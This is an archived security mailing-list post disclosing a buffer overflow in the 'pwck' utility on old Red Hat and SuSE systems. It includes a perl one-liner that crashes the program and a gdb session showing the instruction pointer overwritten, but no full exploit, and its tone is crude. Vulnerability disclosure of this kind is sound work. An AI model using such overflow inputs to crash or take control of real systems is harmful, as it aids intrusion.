lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: d4yj4y at yahoo.com (Day Jay) Subject: Overflow in "pwck" on Redhat 8.x and Suse d4y-j4y from Chung's Donut Shop has found a problem with "pwck" on Redhat 8.0 and Suse 7.x -- probably an issue with later versions as well. Per the documentation: pwck: verifies the integrity of the system authentication information. All entries in the /etc/passwd and /etc/shadow are checked to see that the entry has the proper format and valid data in each field. The user is prompted to delete entries that are improperly formatted or which have other incorrectable errors. With that in mind, the program is insecure. It's not setuid root, but could have other implications but I don't know what. [root@...rmom]# /usr/sbin/pwck `perl -e 'print "Chungs_Donut_Shop" x 135'` Segmentation fault [root@...rmom]# interseting sh: interesting: command not found [root@...rmom]# gdb /usr/sbin/pwck GNU gdb 20010316 Copyright 2001 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-suse-linux"...(no debugging symbols found)... (gdb) set args `perl -e 'print "Z" x 6999'` (gdb) run Starting program: /usr/sbin/pwck `perl -e 'print "Z" x 6999'` (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x5a5a5a5a in ?? () (gdb) info reg eip eip 0x5a5a5a5a 0x5a5a5a5a (gdb) whoa we overwrote the eip Undefined command: "whoa". Try "help". (gdb) quit So we have overwritten the EIP with ZZZZZZZZZZZZs It's sleepy. Anyway, to lazy to try to write another non setuid root exploit. So, there you go. I also haven't checked out the source because I'm too lazy and I'm not good at reading or really writing code. I'm also too lazy to find the exact buffer size so fuck you. __________________________________________________ Do you Yahoo!? Yahoo! Mail Plus – Powerful. Affordable. Sign up now. http://mailplus.yahoo.com
Powered by blists - more mailing lists